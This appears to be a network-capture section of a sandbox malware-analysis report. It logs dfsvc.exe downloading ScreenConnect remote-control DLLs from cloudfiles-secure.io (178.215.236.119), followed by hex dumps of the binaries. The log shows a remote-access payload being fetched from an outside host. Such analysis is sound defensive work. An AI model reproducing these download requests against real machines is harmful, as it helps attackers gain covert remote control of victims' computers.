2024-10-02 04:16:33 UTC	16384	IN	Data Raw: 01 47 1f 16 00 f6 03 58 1f 16 00 30 07 69 1f 16 00 ab 08 47 1f 16 00 30 04 71 1f 16 00 4d 07 7b 1f 16 00 01 00 85 1f 16 00 3b 03 85 1f 06 00 ce 72 8e 1f 06 00 69 5c 9d 1d 06 00 ce 72 8e 1f 06 00 a5 75 8e 1d 01 00 e3 74 93 1f 01 00 e5 59 a9 10 01 00 50 37 99 1f 36 00 56 0a 9e 1f 16 00 8a 02 a3 1f 36 00 56 0a af 1f 16 00 a0 00 a3 1f 36 00 56 0a e6 11 16 00 70 00 dc 11 16 00 94 03 52 12 06 00 12 81 64 07 06 00 06 63 b4 11 06 00 7b 6d 0f 11 06 00 ce 72 b9 11 06 00 71 32 c6 11 06 00 9c 79 cb 11 06 00 90 83 a6 10 06 00 a9 62 2c 13 06 00 ce 72 b9 11 06 00 19 0d 58 04 06 00 26 77 b4 1f 06 00 ce 72 b9 1f 06 00 ac 65 7a 1e 06 00 7d 5d cb 11 36 00 56 0a be 1f 16 00 6c 01 c3 1f 06 00 ce 72 d5 1f 06 00 12 81 2a 1f 06 00 1a 63 da 1f 06 00 e4 7d 74 1d 06 00 79 59 ec 1f Data Ascii: GX0iG0qM{;ri\rutYP76V6V6VpRdc{mrq2yb,rX&wrez}]6Vlr*c}tyY
2024-10-02 04:16:33 UTC	16384	IN	Data Raw: b2 00 00 00 00 c4 01 1e 2a ce 2b e8 03 8c b2 00 00 00 00 94 00 7b 3e d8 2b e9 03 00 00 00 00 00 00 c4 05 42 64 e2 2b ea 03 2f b3 00 00 00 00 81 00 bc 71 e2 2b eb 03 50 b3 00 00 00 00 c4 00 58 10 d1 21 ec 03 a0 b9 00 00 00 00 81 00 81 2a e9 2b ed 03 08 ba 00 00 00 00 91 00 00 0f f8 2b f0 03 a0 ba 00 00 00 00 81 00 6a 09 08 2c f4 03 c0 ba 00 00 00 00 91 18 97 66 aa 20 f5 03 cc ba 00 00 00 00 86 18 91 66 01 00 f5 03 d4 ba 00 00 00 00 83 00 87 01 0f 2c f5 03 f3 ba 00 00 00 00 91 18 97 66 aa 20 f6 03 ff ba 00 00 00 00 86 18 91 66 01 00 f6 03 07 bb 00 00 00 00 83 00 3a 00 20 2c f6 03 0f bb 00 00 00 00 83 00 74 03 27 2c f7 03 17 bb 00 00 00 00 83 00 a3 01 78 29 f8 03 2a bb 00 00 00 00 86 18 91 66 01 00 f9 03 32 bb 00 00 00 00 83 00 b9 02 76 07 f9 03 56 bb 00 00 Data Ascii: +{>+Bd+/q+PX!++j,f f,f f: ,t',x)*f2vV
2024-10-02 04:16:33 UTC	16384	IN	Data Raw: 1c 41 13 6b 00 a0 1c 60 13 6b 00 a0 1c 61 13 1a 00 db 2e 61 13 6b 00 a0 1c 80 13 6b 00 a0 1c a3 13 6b 00 a0 1c c3 13 6b 00 a0 1c e1 13 6b 00 a0 1c e3 13 6b 00 a0 1c 01 14 6b 00 a0 1c 03 14 6b 00 a0 1c 21 14 6b 00 a0 1c 41 14 6b 00 a0 1c 60 14 6b 00 a0 1c 61 14 6b 00 a0 1c 63 14 6b 00 a0 1c 81 14 6b 00 a0 1c 83 14 6b 00 a0 1c a0 14 6b 00 a0 1c a1 14 6b 00 a0 1c c1 14 6b 00 a0 1c c3 14 6b 00 a0 1c e1 14 6b 00 a0 1c e3 14 6b 00 a0 1c 01 15 6b 00 a0 1c 03 15 6b 00 a0 1c 21 15 6b 00 a0 1c 23 15 6b 00 a0 1c 41 15 1a 00 5c 2f 41 15 6b 00 a0 1c 44 15 c2 05 a0 1c 61 15 6b 00 a0 1c 63 15 6b 00 a0 1c 80 15 6b 00 a0 1c 81 15 6b 00 a0 1c 83 15 6b 00 a0 1c a0 15 6b 00 a0 1c a1 15 1a 00 db 2e a1 15 6b 00 a0 1c a3 15 6b 00 a0 1c c0 15 6b 00 a0 1c c1 15 6b 00 a0 1c c3 15 Data Ascii: Ak`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kA\/AkDakckkkkk.kkkk
2024-10-02 04:16:33 UTC	16384	IN	Data Raw: 52 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 49 42 69 74 6d 61 70 44 61 74 61 00 62 69 74 6d 61 70 44 61 74 61 00 64 61 74 Data Ascii: RequestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationDataIBitmapDatabitmapDatadat
2024-10-02 04:16:33 UTC	16384	IN	Data Raw: 6b 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 52 65 63 65 69 76 Data Ascii: kMonitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnect.Properties.CommandReceiv
2024-10-02 04:16:33 UTC	16384	IN	Data Raw: 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 13 56 00 6f 00 6c 00 Data Ascii: ommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolumeCommandVol
2024-10-02 04:16:33 UTC	16384	IN	Data Raw: 72 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 06 01 00 e4 00 00 00 06 01 00 48 00 00 00 06 01 00 49 00 00 00 06 Data Ascii: rtMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMultipleTInheritedHI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49755	178.215.236.119	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:16:34 UTC	104	OUT	GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1 Host: cloudfiles-secure.io Accept-Encoding: gzip
2024-10-02 04:16:35 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 68096 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:16:34 GMT Connection: close
2024-10-02 04:16:35 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 d8 54 90 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 64 fa 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0T" 0 @ d@
2024-10-02 04:16:35 UTC	16384	IN	Data Raw: 00 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a 1e 02 28 1d 00 00 0a 2a 00 00 00 13 30 03 00 43 00 00 Data Ascii: o-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,oe4g(V{To#o((J{Vo)(*(0C
2024-10-02 04:16:35 UTC	16384	IN	Data Raw: 27 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69 02 c3 17 14 01 29 05 7a 2d f6 00 59 03 d0 2d 06 16 a4 Data Ascii: '--.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi)z-Y-
2024-10-02 04:16:35 UTC	16384	IN	Data Raw: 69 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70 44 6f 6d 61 69 6e 45 78 63 65 70 74 69 6f 6e 00 49 6e Data Ascii: ityActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogAppDomainExceptionIn
2024-10-02 04:16:35 UTC	2776	IN	Data Raw: 00 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 Data Ascii: SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProcessIDExecutablePath

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49758	178.215.236.119	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:16:35 UTC	98	OUT	GET /Bin/ScreenConnect.Windows.dll HTTP/1.1 Host: cloudfiles-secure.io Accept-Encoding: gzip
2024-10-02 04:16:36 UTC	218	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 1721856 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:16:36 GMT Connection: close
2024-10-02 04:16:36 UTC	16166	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c da d0 ab 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 82 5d 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 5b ab 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELl" 0>] ` [@
2024-10-02 04:16:36 UTC	16384	IN	Data Raw: 00 00 0a 14 04 05 16 28 ba 00 00 06 13 06 de 11 09 28 01 02 00 0a dc 06 2c 06 06 6f 11 00 00 0a dc 11 06 2a 00 00 01 34 00 00 02 00 99 00 0a a3 00 0c 00 00 00 00 02 00 81 00 2e af 00 0c 00 00 00 00 02 00 73 00 87 fa 00 07 00 00 00 00 02 00 06 00 fb 01 01 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 e0 00 00 06 72 71 06 00 70 28 02 02 00 0a 0a 02 06 28 bd 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 be 00 00 06 18 8d d9 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 03 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 04 02 00 0a 73 05 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0d 01 00 06 1f 0a 16 20 7c 4f 00 00 73 07 02 00 0a 28 6e 01 00 0a 2c 35 Data Ascii: ((,o4.s0(~^(rqp((0G%-&(%rp%rp(~%-&s%(2+0:( \|Os(n,5
2024-10-02 04:16:36 UTC	16384	IN	Data Raw: fc 00 00 04 7d f8 00 00 04 02 17 7d f7 00 00 04 17 2a 02 15 7d f7 00 00 04 02 02 7b fc 00 00 04 18 28 aa 01 00 06 7d fc 00 00 04 02 7b fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c ce 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4d 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 53 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a 02 15 7d fd 00 00 04 1f 09 0b 02 17 07 25 17 58 0b 1f Data Ascii: }}}{(}{(-{s{z2{0<{3{(NoO3}+sM{}(Sz(,}(NoO}*0{,;}%X
2024-10-02 04:16:36 UTC	16384	IN	Data Raw: 6e 22 06 00 71 cc 6e 22 06 00 48 cf 6e 22 06 00 5e 3e 6e 22 06 00 9f a3 6e 22 06 00 c4 b2 a0 02 06 00 36 b2 6e 22 06 00 49 a7 a0 02 06 00 41 a7 6e 22 06 00 81 cc 6e 22 06 00 af 54 6e 22 06 00 ba 90 6e 22 06 00 9f a3 6e 22 06 00 7c aa 6e 22 06 00 f7 cf 71 22 06 00 ce 45 71 22 06 00 66 46 6e 22 06 00 07 59 6e 22 06 00 b6 bf 6e 22 06 00 31 6a 6e 22 06 00 8f 9f 6e 22 06 00 e8 60 6e 22 06 00 48 cf 6e 22 06 00 f4 5f 6e 22 06 00 04 52 25 25 06 00 e3 be 6e 22 06 00 5b be 6e 22 06 10 55 51 f7 25 06 06 80 30 af 08 56 80 80 c8 fb 25 56 80 69 c8 fb 25 06 06 80 30 af 08 56 80 35 9d 00 26 06 06 80 30 af 08 56 80 62 27 05 26 56 80 90 29 05 26 56 80 e3 0d 05 26 56 80 86 29 05 26 06 06 80 30 6e 22 56 80 2c 39 0a 26 56 80 97 c8 0a 26 56 80 5f 39 0a 26 56 80 60 bd 0a 26 56 Data Ascii: n"qn"Hn"^>n"n"6n"IAn"n"Tn"n"n"\|n"q"Eq"fFn"Yn"n"1jn"n"`n"Hn"_n"R%%n"[n"UQ%0V%Vi%0V5&0Vb'&V)&V&V)&0n"V,9&V&V_9&V`&V
2024-10-02 04:16:36 UTC	16384	IN	Data Raw: c6 00 5e 53 10 00 0f 07 5e a5 00 00 00 00 91 18 18 99 0e 27 10 07 6a a5 00 00 00 00 86 18 ed 98 01 00 10 07 72 a5 00 00 00 00 83 00 d7 02 29 3b 10 07 7a a5 00 00 00 00 83 00 81 0a 30 3b 12 07 82 a5 00 00 00 00 86 18 ed 98 01 00 13 07 8a a5 00 00 00 00 83 00 d6 07 1b 3b 13 07 9d a5 00 00 00 00 91 18 18 99 0e 27 14 07 a9 a5 00 00 00 00 86 18 ed 98 01 00 14 07 b1 a5 00 00 00 00 83 00 ab 02 39 3b 14 07 b9 a5 00 00 00 00 83 00 55 0a 39 3b 15 07 c1 a5 00 00 00 00 86 18 ed 98 05 00 16 07 e0 a5 00 00 00 00 e1 01 ac 58 01 00 17 07 18 a6 00 00 00 00 e1 01 37 c2 3d 00 17 07 e4 a7 00 00 00 00 81 00 d5 0d 01 00 17 07 00 a8 00 00 00 00 e1 09 d0 bb e0 18 17 07 08 a8 00 00 00 00 e1 01 13 b6 01 00 17 07 0f a8 00 00 00 00 e1 09 96 bc 4e 00 17 07 18 a8 00 00 00 00 e1 01 bd Data Ascii: ^S^'jr);z0;;'9;U9;X7=N
2024-10-02 04:16:36 UTC	16384	IN	Data Raw: 5b 34 45 10 a9 06 0b 5f 39 02 3c 04 8d 4a a0 02 91 04 5f 46 01 00 89 06 8d 58 39 02 d1 03 86 c7 01 00 69 04 a6 58 01 00 71 09 dc 37 b1 1a 71 09 1c 36 89 01 59 06 ab cc e9 1a e1 02 ed 98 f8 1a e1 02 ed 98 07 1b 41 06 ed 98 10 00 b9 08 ae 9e 16 1b 19 0a 85 3e 1d 1b 29 02 96 4c 7c 04 31 02 ed 98 01 00 99 04 68 53 f5 09 c1 09 21 5b 10 00 39 02 96 4c 7c 04 39 02 35 70 89 01 99 02 e2 6a 7c 04 99 02 28 59 3b 1b b1 07 1b 6b 3d 0b 4c 04 a8 98 5b 00 54 04 b5 bc 49 00 44 02 ab 0d d9 00 08 00 14 00 25 1c 08 00 18 00 2a 1c 08 00 1c 00 2f 1c 08 00 20 00 34 1c 08 00 b8 00 39 1c 0e 00 bc 00 3e 1c 0e 00 c0 00 51 1c 0e 00 c4 00 62 1c 08 00 c8 00 75 1c 08 00 cc 00 7a 1c 0e 00 d0 00 7f 1c 0e 00 d4 00 8e 1c 0e 00 d8 00 9d 1c 0e 00 e0 00 c6 1c 08 00 f0 00 64 1d 08 00 f4 00 69 Data Ascii: [4E_9<J_FX9iXq7q6YA>)L\|1hS![9L\|95pj\|(Y;k=L[TID%*/ 49>Qbuzdi
2024-10-02 04:16:36 UTC	16384	IN	Data Raw: 3e 39 5f 5f 31 33 35 5f 31 00 3c 47 65 74 46 75 6c 6c 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 3e 62 5f 5f 31 33 35 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 34 37 5f 31 00 3c 43 6f 6e 6e 65 63 74 53 65 72 76 65 72 43 6c 69 65 6e 74 4e 61 6d 65 64 50 69 70 65 73 3e 67 5f 5f 57 61 69 74 41 6e 64 43 6f 6e 6e 65 63 74 4e 61 6d 65 64 50 69 70 65 7c 39 37 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 37 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 39 5f 5f 32 39 5f 31 00 3c 54 72 79 47 65 74 41 63 74 69 76 65 43 6f 6e 73 6f 6c 65 53 65 73 73 69 6f 6e 49 44 3e 62 5f 5f Data Ascii: >9__135_1<GetFullExecutablePath>b__135_1<>c__DisplayClass47_1<ConnectServerClientNamedPipes>g__WaitAndConnectNamedPipe\|97_1<PopulateContextMenuStripItems>b__7_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>9__29_1<TryGetActiveConsoleSessionID>b__
2024-10-02 04:16:36 UTC	16384	IN	Data Raw: 62 61 73 65 4b 65 79 48 61 6e 64 6c 65 00 6c 69 62 72 61 72 79 48 61 6e 64 6c 65 00 72 65 73 75 6d 65 5f 68 61 6e 64 6c 65 00 54 6f 52 65 63 74 61 6e 67 6c 65 00 47 65 74 43 6c 69 65 6e 74 52 65 63 74 61 6e 67 6c 65 00 47 65 74 57 69 6e 64 6f 77 52 65 63 74 61 6e 67 6c 65 00 72 65 63 74 61 6e 67 6c 65 00 70 44 61 74 61 46 69 6c 65 00 75 6c 6c 54 6f 74 61 6c 50 61 67 65 46 69 6c 65 00 75 6c 6c 41 76 61 69 6c 50 61 67 65 46 69 6c 65 00 43 72 65 61 74 65 46 69 6c 65 00 68 54 65 6d 70 6c 61 74 65 46 69 6c 65 00 44 65 6c 65 74 65 46 69 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c Data Ascii: baseKeyHandlelibraryHandleresume_handleToRectangleGetClientRectangleGetWindowRectanglerectanglepDataFileullTotalPageFileullAvailPageFileCreateFilehTemplateFileDeleteFileMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHel
2024-10-02 04:16:36 UTC	16384	IN	Data Raw: 70 00 3c 39 3e 5f 5f 43 6c 6f 73 65 44 65 73 6b 74 6f 70 00 43 72 65 61 74 65 44 65 73 6b 74 6f 70 00 53 77 69 74 63 68 44 65 73 6b 74 6f 70 00 4f 70 65 6e 44 65 73 6b 74 6f 70 00 6c 70 44 65 73 6b 74 6f 70 00 54 72 79 45 6e 73 75 72 65 54 68 72 65 61 64 4f 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 4f 70 65 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 6c 70 73 7a 44 65 73 6b 74 6f 70 00 64 65 73 6b 74 6f 70 00 65 5f 73 70 00 55 72 69 53 63 68 65 6d 65 48 74 74 70 00 4e 61 74 69 76 65 43 6c 65 61 6e 75 70 00 6c 70 4c 6f 61 64 4f 72 64 65 72 47 72 6f 75 70 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 